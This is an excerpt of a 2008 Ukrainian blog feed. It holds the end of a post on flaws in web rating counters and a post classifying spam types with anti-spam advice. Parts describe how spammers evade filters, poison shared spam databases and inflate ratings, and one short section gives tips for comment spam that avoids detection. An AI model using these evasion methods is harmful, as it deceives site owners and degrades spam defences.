<h1 id="-6">Висновки</h1>
<p>Думаю тема точно є цікавою для власників даних рейтингових систем. І сумніваюсь, що ці дані були підмічені лише тим, хто був ініціатором даної статті.<br/><br />
Якщо дивитись на сторону користувачів даних сервісів, то можна допустити, що через ймовірні помилки деякі вебсайти програють в нечесній грі іншим. Тому гадаю виправлення помилок потрібне.<br/><br />
Якщо Вас зацікавила дана тематика, то я її можу продовжувати майже постійно, в залежності від надходження даних та від Ваших побажань через відповідну форму <a href="http://my.ukrweb.info/suggestions#">Пропозиції і тематики</a> на даному вебсайті<br/></br/></br/></br/></p>
<p>Код цих exploit - ів буде досить швидко відображено голим текстом, бо існує імовірність підміни його власниками даних сервісів, хоча він побудований так, що для цілісності даних на вебсайті, де він розміщений особливих проблем немає - є лише ймовірність порушення дизайну та відображення саме тої сторінки, на якій він викладений.<br/><br />
Крім того кожен, хто відобразить цей код в себе на вебсайті може закрити його в рамки 1х1 блоку + забезпечити перевірку на зміни.<br/><br />
Успіху Вам, і бажаю здорового скептицизму в аналізі рейтингів в інтернеті.<br/></br/></br/></br/></p>
<h2 id="PS">PS</h2>
<p>Якщо будуть бажаючі - дана тематика буде вестись на сторінках веблогу з певною періодичністю. Повірте - навіть такі лічильники як i.ua, li.ru, mail.ru etcetera - мають аналогічні проблеми. І в Наших силах зробити їх більш актуальними.</p>
    ]]></content>
  </entry>
  <entry>
    <title>Спам технології, дві сторони медалі</title>
    <link rel="alternate" type="text/html" href="http://my.ukrweb.info/2008/03/2/%D1%81%D0%BF%D0%B0%D0%BC-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D1%96%D1%97-%D0%B4%D0%B2%D1%96-%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%BD%D0%B8-%D0%BC%D0%B5%D0%B4%D0%B0%D0%BB%D1%96" />
    <id>http://my.ukrweb.info/2008/03/2/%D1%81%D0%BF%D0%B0%D0%BC-%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D1%96%D1%97-%D0%B4%D0%B2%D1%96-%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%BD%D0%B8-%D0%BC%D0%B5%D0%B4%D0%B0%D0%BB%D1%96</id>
    <published>2008-03-04T01:08:33+02:00</published>
    <updated>2008-08-22T16:09:30+03:00</updated>
    <author>
      <name>podarok</name>
    </author>
    <category term="IT" />
    <category term="pingback" />
    <category term="refback" />
    <category term="trackback" />
    <category term="ua" />
    <category term="ukrweb" />
    <category term="безпека" />
    <category term="спам" />
    <summary type="html"><![CDATA[    ]]></summary>
    <content type="html"><![CDATA[<p>&lt;!--break--><br />
<div class="toc">
<div class="toc-title">Меню 8) сторінки [<a href="#" class="toc-toggle">hide</a>]</div>
<div class="toc-list">
<ol>
<li><a href="#Prolog">Prolog.</a></li>
<li><a href="#i">Рiзновиди спаму.</a>
<ol>
<li><a href="#emailspam">Почтовий спам - email-spam</a>
<ol>
<li><a href="#spyware">Метод 1 - spyware</a></li>
<li><a href="#adware">Метод 2(доброякісний) - adware</a></li>
<li><a href="#spywareadware">Метод 3(комбінований) - spyware+adware</a></li>
</ol>
</li>
<li><a href="#spam">Як генерується spam</a></li>
<li><a href="#internetspam">Спам в Інтернет - internet-spam</a>
<ol>
<li><a href="#trackbackspam">Спам в коментарях, trackback spam</a></li>
<li><a href="#Refererspampingback">Referer spam та спам в pingback-ах</a></li>
<li><a href="#trackback">Спам в trackback-ах</a></li>
</ol>
</li>
<li><a href="#blogspam">Блогспам - blogspam</a>
<ol>
<li><a href="#-1">Як боротись?</a></li>
<li><a href="#-2">Як не боротись!</a></li>
<li><a href="#-3">Як спамити?</a></li>
</ol>
</li>
<li><a href="#Spam">Spam в рейтингах</a>
<ol>
<li><a href="#-4">Як боротись?</a></li>
</ol>
</li>
</ol>
</li>
<li><a href="#Epilog">Коротко Epilog</a></li>
</ol>
</div>
</div>
<h1 id="Prolog">Prolog.</h1>
</p><p> Привіт... <BR />Довго тримав в собі дану статтю, в основному вивчаючи людську психологію, переглядаючи можливості всіляких фільтрів та антиспам сервісів, а також читаючи коментарі до різноманітних антиспам флешмобів в інтернеті...  <BR /><BR />Отже - спам. Що це - розповідати було б смішно і п-а-д-о-н-к-і написали б - архі-б-а-я-н. <BR />А розповім я про технології, так би мовити spam inside. <BR /><BR /><BLOCKQUOTE>Знаю, що глянувши на лічильники даного веблогу можна одразу почати недовіряти тексту і Ваше право робити з цією інформаціює все, що Вам захочеться.  <BR /><BR /></blockquote><BR />Вернусь до наших баранів. <BR />На цю статтю частина людей буде дивитись із боку боротьби проти спаму, а частина - спамери. <BR /><STRONG>І тих і тих я поважаю, Ви обрали свою позицію усвідомлено. </strong><BR />Враховуючи це - буду описувати методи спаму і методи антиспаму, хоча я особисто рахую, що найкращий метод антиспаму - премодерація+постмодерація одночасно.  <BR /><br />
<h1 id="i">Рiзновиди спаму.</h1>
</p><p><UL><LI>поштовий спам</li><LI>спам в трекбеках</li><LI>спам в пінгбеках</li><LI>referrer спам</li><LI>спам в коментарях</li><LI>блогспам</li><LI>пошуковий спам</li><LI>спам в рейтингах(TOP спам)</li><LI>спам в месенджерах</li><LI>javascript спам</li><LI>антиантиспам</li><LI>клоакінг</li><LI>rss спам (для пошуковиків)</li><LI>будь-які модифікації всіх вищеназваних</li></ul>Список неповний і буду радий, якщо мені допоможуть його "наповнити".<BR />Загалом можна переозначити поняття спаму... Це вже не тільки електронна пошта... Це щось небажане...<BR /><BR /><br />
<h2 id="emailspam">Почтовий спам - email-spam</h2>
</p><p>Думаю з цим терміном знайомі всі користувачі інтернету... Просто небажана пошта, реклама, яку не замовляли, вкладення з вірусами. Особліво небезпечні варіанти ті, які втираються в довіру до користувача - в ідеальних випадках, якщо лист приходить наче від Вашого друга, або знайомого, іноді навіть із реальною електронною адресою друга... З цим я зустрічався в англомовному сегменті, де спамери набагато досвідченіші за наших і формують бази електронних адрес та зв'язки між ними.<BR /><br />
<h3 id="spyware">Метод 1 - spyware</h3>
</p><p><UL><LI><STRONG>Простий</strong> - Генерується електронний лист в основному автоматом, з використанням лівих електронних адрес, іноді з посиланням "Unsubscribe", яке приводить на якусь сторінку, що для спамера відображає факт - електронна адреса активна... Ніхто звичайно Вас не відпише, більше того - про Вас з допомогою спеціальніх скріптів можуть дізнатись додаткову інформацію(в основному GEO).</li></ul><BLOCKQUOTE>Росзилається такий спам в основному на дуже велику кількість електронних адрес з метою збору статистики.<BR /><BR /></blockquote><UL><LI><STRONG>Складний</strong> - з метою збору цільової аудиторії та викрадання інформації. В даному випадку розсилаються сторінки, що мають характер троянських коней. Можуть повністю імітувати роботу відомих вебсервісів (Paypal, MSN, MySpace etcetera). В цьому випадку Вас намагаються "взяти на понт" і заставити Вас ввести персональні дані після переходу по посиланню...</li></ul><UL><LI><STRONG>Листи щастя. </strong>Одна із методик збору реальних електронних адрес. В такому листі може бути зовсім безневинна інформація в вигляді набору класних картинок, анекдотів etcetera. Спамер відсилає таке повідомлення в надії, що його будуть багато разів пересилати (Forward) багатьом отримувачам, в результаті йому(спамеру), завжди будуть приходити копії з достатньою кількістю реальних електронних адрес.</li></ul><UL><LI><STRONG>Спам-антиантиспам </strong>- лист складається з двох частин - текстової та графічної. Текстова частина може бути прихована методами HTML із розміром шрифта в 1 пункт, а головну інформацію несе відповідно картинка.</li></ul><DIV align="center"><A target="_blank" href="http://my.ukrweb.info/files/antiantispam.png#"><IMG width="398" lang="uk-UA" height="306" align="middle" alt="Анти антиспам - приклад" longdesc="http://my.ukrweb.info/спам" src="http://my.ukrweb.info/files/antiantispam.png" /></a></div><BLOCKQUOTE>Відмічати дане повідомлення як спам в фільтрах необхідно лише після перевірки текстової частини... В основному там текст, який ніколи не вважається спамом і відмітивши цей лист як спам Ви послабите фільтруючі властивості Вашого антиспам фільтра.<BR /><BR /></blockquote><UL><LI><STRONG>Антифільтр </strong>- спам, який пробиває ваш фільтр різноманітними методами. Один з них - наведений прикладом више, інші:<UL><LI>Некоректне вказування кодування в листі, щоб ваш фільтр не знайшов "спам" слів</li><LI>Приховування тексту методами html</li></ul><DIV align="center"><A target="_blank" href="http://my.ukrweb.info/files/antiantispam2.png#"><IMG width="328" lang="uk-UA" height="413" align="middle" alt="Антиантиспам" longdesc="http://my.ukrweb.info/спам" src="http://my.ukrweb.info/files/antiantispam2.png" /></a></div><UL><LI>Використання в тексті популярних слів (Google, Microsoft, Compaq) англійською та подальший текст - Російською.</li><LI>Навчання спамерами відомих фільтрів з метою зараження центрального репозиторія (Akismet, httpbl etcetera).</li></ul></li></ul><br />
<h3 id="adware">Метод 2(доброякісний) - adware</h3>
</p><p><UL><LI><STRONG>Реклама цільових продуктів</strong>. Спамери, заробляючи гроші, знаходять клієнтів, що присилають Вам банальну рекламу. В основному проблем із такими листами немає.</li><LI><STRONG>Спам повідомлення через Сервіси коротких повідомлень</strong>. Думаю кожен власник одного з ICQ, YahooIM. MSN IM, Jabber IM etcetera хоч один раз в житті зустрічався із повідомленням, яке неслов собі спам.</li><LI><STRONG>Спам-посилання</strong> - приходить лист із Одним реченням-посиланням, що намагається привернути увагу цільової аудиторії.</li></ul><br />
<h3 id="spywareadware">Метод 3(комбінований) - spyware+adware</h3>
</p><p>Тут вже спамери роблять різноманітні комбінації скажімо безневинної реклами та вірусу, або Листи щастя із словом-реченням, яке точно має характер спаму(воно візуально може навіть не відобразитись у Вас, приховане методами HTML) і націлене не пробій Вашого антиспам фільтру задля того, щоб наступне - реально спам повідомлення проскочило та відобразилось у Вас.<BR /><BR /><br />
<h2 id="spam">Як генерується spam</h2>
</p><p> <UL><LI>Через недосвідченість деяких адмінів, що залишають відкритими почтові сервери, спамери можуть використовувати їхні сервери для розсилання <EM>( Мав практику аналізу такого сервера )</em></li><LI>Використовуючи віруси трояни, а також rootkit-и спамери встановлюють на клієнстські машини(Windows) почтові сервери і з цих машин розсилають почту <EM>(Сам був нещодавно свідком такого взлому, безпосередньо в себе в офісі).</em></li><LI>Використовуючи помилки в відомому програмному забезпеченні вебсерверів та вебпрограм можуть ламати їх та записувати на сайт спеціальні скрипти, з допомогою яких можуть відправляти спам прямо з Вашого вебсайту. <EM>( Мав практику безпосередньо на своєму вебхостінгу в минулому, коли зловмисник через дірку в відомому cms залив на вебсайт php скрипт)</em></li><LI>Купляється якийсь пробний і дешевий хостінг, через який розчисається спам аж до моменту, поки його не закриють.</li></ul><br />
<h2 id="internetspam">Спам в Інтернет - internet-spam</h2>
</p><p>Я спеціально відділив окремим пунктом цей спам, бо НМД - він проходить найбільш активну стадію розвитку зараз в Українському сегменті(і не тільки). Враховуючи доступну монетизацію інтернету, кожен більш-менш обізнаний з комп'ютерним світом починає оптимізацію своїх ресурсів, з яких заробляє гроші.<BR /><br />
<h3 id="trackbackspam">Спам в коментарях, trackback spam</h3>
</p><p>Думаю кожен вебсервіс, в ядрі якого присутня вільна можливість дописування інформації відвідувачами, мав практику отримання такого спаму.<BR /><BR /><br />
<h4 id=""><STRONG>Мета спаму</strong></h4>
</p><p><STRONG>Перша Мета</strong> - Посилання на сторінку, рейтинг якої спамер намагається підвищити. <BR />Останнім часом з'явились дуже складні методи спаму, в результаті яких додається коментар дуже схожої тематики, в основному вручну, іноді дуже навіть по темі в розрахунку на те, що модератор не забанить даний допис і посилання буде працювати. Іноді посилання публікується звичайним текстом, в розрахунку на те, що користувачі перейдуть по ньому вручну.<BR />Як боротись з таким спамом? Нажаль лише постмодерація + чорний список посилань та ключових слів.<BR /><STRONG>Інша мета</strong> - антиантиспам. Якщо Ви натиснете на такому повідомленні - "помітити як спам", Ваш фільтр послабить свою пильність.<BR /><BLOCKQUOTE>Заборонено використання автоматичних фільтрів типу Akismet, httpbl, bayesian базованих а також інших роботів, які аналізують контент та складають імовірність спаму. Якщо ви на такому повідомленні натиснете спам - Ваш фільтр почне ловити нормальні повідомлення. <BR />Якщо ж Ви все-таки хочете покластись на "розум" робота - вмикайте премодерацію для повідомлень, впізнаних роботом і у випадку, якщо корисне повідомлення впізнано як спам - вчіть робота відповідним алгоритмом - "не спам", а повідомлення, що несе в собі характер спаму - просто видаляйте, або якщо воно несе в собі корисну інформацію - видаляйте ту його частину, що є безпосередньо спамом<BR /><BR /><BR /></blockquote><br />
<h3 id="Refererspampingback">Referer spam та спам в pingback-ах</h3>
</p><p>Даний вид спаму розрахований на цільову аудиторію - власників вебсервісів, що мають доступ до статистики... В цьому випадку спамер відсилає в заголовках свого інтернет браузера поле Referer в якому вказує рекламне посилання з надією, що Ви, як користувач, що переглядає статистику, перейдете по посиланню. <BR /><DIV align="center"><A target="_self" href="http://my.ukrweb.info/files/referer_spam.png#"><IMG width="403" lang="uk-UA" height="252" align="middle" alt="Реферер спам" longdesc="http://my.ukrweb.info/спам" src="http://my.ukrweb.info/files/referer_spam.png" /></a></div><STRONG>Боротись з даним методом</strong> можна аналогічно - робити перенаправлення на вебсайт рекламодавця 8))). Хоча в більшості випадків такий спам генерується роботом і швидше за все на Ваше перенаправлення не буде жодної реакції.<BR /><BR /><A lang="uk-UA" target="_self" name="Спам через referer" href="http://my.ukrweb.info/spam-tehnologiyi-dvi-storoni-medali-uk#comment-155"></a><BR /><br />
<h3 id="trackback">Спам в trackback-ах</h3>
</p><p>Даний вид спаму розповсюджений в основному в англомовному сегменті, через необізнаність користувачів - що таке трекбеки. Що воно є - можете прочитати на сторінках даного веблогу, а я продовжу розповідь про спам. <BR />Спамери сканують роботами підряд всі вебсторінки на наявність rdf тегів і колекціонують їх у відповідні бази даних. Після цього відкритим методом посилають <EM><STRONG>trackback ping POST</strong></em> пакет з надією, що модератор не побачить спам повідомлення і розмістить посилання на своєму ресурсі.<BR /><STRONG>Боротьба</strong> - виключна премодерація + алгоритм Bayesian підключаєм в випадку з'явлення великої кількості корисних trackback-ів, але разом із режимом <EM>nofollow </em>або <EM>redirect </em>до моменту <EM>approve </em>(дозволу на повноцінне публікування)<BR /><br />
<h2 id="blogspam">Блогспам - blogspam</h2>
</p><p>Даний метод спаму націлений на пошуковиків та власників блогів та вебсервісів з присутніми коментарями. Ну пошуковики хай розбираються самі, а блогери практично в 100% потрапляють в пастки. Спамер досить часто - <EM>майже</em> нормальна людина, що намагається замилити очі іншим, створивши, як правило, <EM>паразитуючий блог</em>(агрегатор постів популярних блогів), або <EM>блог-клоакінг</em>, який відображається Вам, як аналізуючому посилання(із відповідним referer) із відповідною тематикою та рекламою, дуже схожою до Вашої, але пошуковим сервісам він представляється як набір <EM>sape</em> -подібних адрес, для рекламування та заробітку.<BR /><br />
<h3 id="-1">Як боротись?</h3>
</p><p><UL><LI>В обов'язковому порядку перевіряйте посилання в новому вікні браузера, вводячи адресу вручну, або копіюючи її з іншої сторінки. Таким чином на маленький відсоток зменшиться ймовірність підміни сайту в залежності від referer. Можна спробувати також замінити User-Agent заголовки на один з відомих роботів ( Google, Yahoo, ia_archiver тощо ), тоді ймовірність покращиться.</li><LI>Використовуючи spam-notspam фільтри натискаєте на правильних повідомленнях notspam</li></ul><br />
<h3 id="-2">Як не боротись!</h3>
</p><p><UL><LI><STRONG>Не вмикайте автоматичне видалення повідомлень, якщо воно впізнане як спам </strong>- ризикуєте потрапити в повну тишу, через старання зловмисників, які навчать Ваш фільтр видаляти все. Прикладом є блог <a href="http://ribel.org.ua" title="http://ribel.org.ua">http://ribel.org.ua</a>, в базу фільтра BadBehavior  якого потрапила моя робоча IP адреса (через вірус на одній з машин корпоративної підмережі, що розсилав спам) і всі повідомлення банально не отримуються власником. <EM><STRONG>Завжди давайте шанс повідомленням бути переглянутим</strong></em> перед <EM><STRONG>ручним</strong></em> видаленням, бо існує ймовірність помилкового спрацьовування.</li><LI><STRONG>Не розповсюджуйте глобально Вашу антиспам базу даних</strong>, як це роблять Akismet, httpbl, BadBehavior - Ви можете згарячу рубанути одне неспам повідомлення, а в результаті тисячу користувачів одного з інтернет провайдерів не будуть мати доступ до Вашого сайту і до великої кількості вебсайтів, які повірили глобальній базі даних, що не була перевірена <EM><STRONG>англомовними </strong></em>адміністраторами.</li><LI><STRONG>Не пишіть відкрито списки спам сайтів</strong>, які зустрічаються на Вашому сайті - зловмисники можуть відповісти Вам, написавши тисячі повідомлень від імені Вашого вебсайту на інших блогах і в результаті Ваш сайт потрапить в спамерську базу.</li></ul><br />
<h3 id="-3">Як спамити?</h3>
</p><p><UL><LI>Коментуючи текст статті - пишіть нормальні коментарі, Нічого ж не вартує реально відповісти по темі так, щоб ніхто не запідозрив, що Ви - спамер. В результаті всі будуть довольні.</li><LI>Не намагайтесь Вписувати в поле імені користувача текст для розкрутки - в 99% його сприймуть як спам. Пишіть реальні або віртуальні дані - Скажімо Василь Іванович. Тоді Вас можуть не запідозрити, а пошуковики сприймуть Ваше посилання нормально.</li><LI>Не вкладайте в саме повідомлення посилання більше чим 1 - Запідозрять однозначно! Навіть одне - сприймається людиною дуже негативно.</li></ul><BLOCKQUOTE>Гм... Після прочитання Сам почав розуміти, що результатом виконання цих трьох правил буде <EM><STRONG>Нормальне і живе повідомлення</strong></em>, що по суті своїй <EM>не буде спамом</em>.<BR /><BR /></blockquote><br />
<h2 id="Spam">Spam в рейтингах</h2>
</p><p>Маловивчений вид, але ним користуються багато людей... Скажімо <BR /><UL><LI><EM><STRONG>Партнерські обміни лінками</strong></em>, в яких список формується в залежності від переходів від сайтів партнерів..</li></ul><BLOCKQUOTE>В цьому випадку спамери намагаються наклікати переходи до достатнього рівня, щоб відображатись в списку. <BR /><BR /></blockquote><UL><LI><EM><STRONG>TOP коментаторів.</strong></em></li></ul><BLOCKQUOTE>Якщо у Вас на блозі присутній такий блок, то після попадання в нього спамер "заспокоюється" і перестає коментувати. <BR /><BR /></blockquote><UL><LI><EM><STRONG>ТОР вебсайтів.</strong></em></li></ul><BLOCKQUOTE>Каталоги, рейтинги, голосування без реєстрацій - всі ці технології компрометували себе через можливість накручування різноманітними методами та скриптами, а також помилками і дірами в програмному забезпеченні, що підраховує голоси.</blockquote><br />
<h3 id="-4">Як боротись?</h3>
</p><p>Якщо аналізувати статистику переходів - то вони зроблені на протязі короткого часу і після досягнення результату закінчуються на весь наступний період до оновлення лічильників.<BR />Взагалі будь-яка боротьба - полягає на human-базованому вивченні технології накруток, спаму, антиспаму, антиантиспаму тощо.<BR />В Українському сегменті боротьба із глобальним спамом закінчується на банальній логічній україномовній Captcha, в зв'язку із малорозвинутістю  спеціальних спам-мереж та сервісів, в яких взломом алгоритмів займаються люди, отримуючи малесенький цент за розшифровування Captcha картинок. <BR />Але не пройде і 1-2 роки, як і ми будемо заражені від нашого Молодшого Брата - Росії, які хоч і прикидуються, що не розуміють Української, але все ж вміють гарно спамити.<BR /><BR /><br />
<h1 id="Epilog">Коротко Epilog</h1>
</p><p>Якщо хочете, щоб відкидались спамери, що полюють за посиланнями - <EM><STRONG>зробіть посилання з Вашого вебсайту</strong></em> в частинах, до яких мають доступ користувачі без Вашого відома - <EM><STRONG>неефективними </strong></em>(redirect), тоді Ви будете мати справу лише з цільовою аудиторію. <BR />Крім того <EM><STRONG>ведіть білий список,</strong></em> заохочуйте тих коментаторів, що коментують не тільки заради Власної вигоди та розкрутки власного сервісу - ставте на їхніх посиланнях rel="follow index".<BR />Успіху Вам і сподіваюсь отримати українські неспам <A lang="uk-UA" title="Що таке трекбек" name="Трекбеки" target="_blank" href="http://my.ukrweb.info/trackback-prihovana-tehnologiya-spivpraci-uk#">трекбеки</a><BR /> <BR /> Додатково можна почитати про спам<BR /><A lang="ru-RU" target="_blank" name="пише Viruslist.com" href="http://www.viruslist.com/ru/spam/info?chapter=156609070">www.viruslist.com/ru/spam/info</a></p>
    ]]></content>
  </entry>
</feed>
